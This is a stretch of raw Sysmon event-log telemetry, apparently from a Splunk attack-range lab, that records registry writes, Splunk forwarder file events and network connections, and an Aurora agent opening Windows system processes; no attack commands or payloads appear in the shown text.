13241300x800000000000000045128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:02.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000045127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:02.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000045126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:02.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000045125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:02.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d92b38-0x070c9fd2) 13241300x800000000000000045124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:02.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000045123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:02.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 23542300x800000000000000017605Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:03.454{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=641C519620B4F831162467CC524EBE06,SHA256=CA807E2768301BD831EB354155F3E7CAFCCE20607F0D6641BBA9E5CBBCF5C52E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:03.294{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=261B51976D56F7D27E012386D715459C,SHA256=6546546CA0ED568616DC2E48FF929983A03ACAE8932941D5E3B3159CB11ABE3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:04.399{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25A095790BA2B3AACCA6E3C00FCCDC3A,SHA256=11B9CE80FC9928FD8B3C4189EB83E3F035EAC6295E67F62C3BAD007153F5F490,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017607Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:04.569{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F54B937BFA179ED0454B5148FB195ED1,SHA256=AED71831789D3F798426A1956AF3B35B9E23F66B2CA58F45F5BCEB80D155B370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017606Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:04.154{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:05.484{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9270A92A1C42739979FD8AC75E9E3830,SHA256=45C0A0AD901F8CD0CF1A73573B515ED00FC35CBDA750DEE248D004CA76023485,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017608Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:05.652{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164914A7ADDDAD40210133987BADECEF,SHA256=EADCDB76F562534A8D55A44AD281A6C8AEEB843BFE7807162034F70330B7BB0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:02.516{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56414-false10.0.1.12-8000- 23542300x800000000000000045134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:06.571{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC16E74B1B7550114D79264BB4037D7,SHA256=A0309EABF863EB5EAEF1E7BD187C43CAEEA12A4AA7EB2BCE5A93AA520D7A644D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017610Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:06.741{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CB0B86010A6704086C5F1B85829EDFB,SHA256=3E10B2AB70C7EEAFB7DDC5AC875B40295253568EAFD1EC227F342D08096AE1E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017609Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:04.015{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50143-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000017612Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:07.817{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3AC15876432D18A12BFCD02992D082,SHA256=47B8E5C580AC19FC455AADF104D22C34CD8D54706D3348322FE12CE83F10761E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:07.675{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F328D950F11202385C9D653E4E5FD45,SHA256=BA7C980F6CB78D47B4C670457B327666DC1A7CACE6471AFEC6F4BD7C0841BF27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017611Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:04.922{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50144-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017613Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:08.894{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D672DCAE8AFC1C847F6B12BCC32D7F4,SHA256=ECDEC7E487C2F2135C69E580DE029602F410770765D0594B23F16B7ED94075FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:08.768{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AD045B2468EC0C3CA9938CA7BFBE795,SHA256=4AA6963E2AEEEB7F5BACF476344085AD4544BB53A7A926DC31CF0426328A238A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017614Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:09.982{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A32145AF0DBAAFAAD595C9FAFAD5D60B,SHA256=20EBB9FFDDE8F14912AF19F6E965AE527EBCA5AF9F8BA9494096A1EE22F06F24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:09.847{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B985EFEE8392122B3BE6A1A8DD2B69C5,SHA256=2644752C861BFE501AAB6A1F7C8816D5256F35645ADD50843E5FEBB8D0B58208,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:10.926{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A97893CE86D65030C8EC228BF4E73F8,SHA256=767C2C1155DE20EEC2B7BDB5D36C3CFD73A440F9453A5A02F532EFB02FF8A0B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:07.658{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56415-false10.0.1.12-8000- 23542300x800000000000000045164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.996{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74EBCA100AAF8308882A6C25043A78A3,SHA256=A1EA6F1EF6FA8DCAF65F82C8F6A78E2002E78311F991BD1FFF6322A3803EBB77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.946{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.944{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.939{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.934{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000017615Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:11.077{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=548A365144B9D008380196CABFEA159C,SHA256=6C45D1CA53427BBF0A72CE41B0901F1778AABC53198657797011D9FCE4EAC7CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.923{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.918{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.913{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.906{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 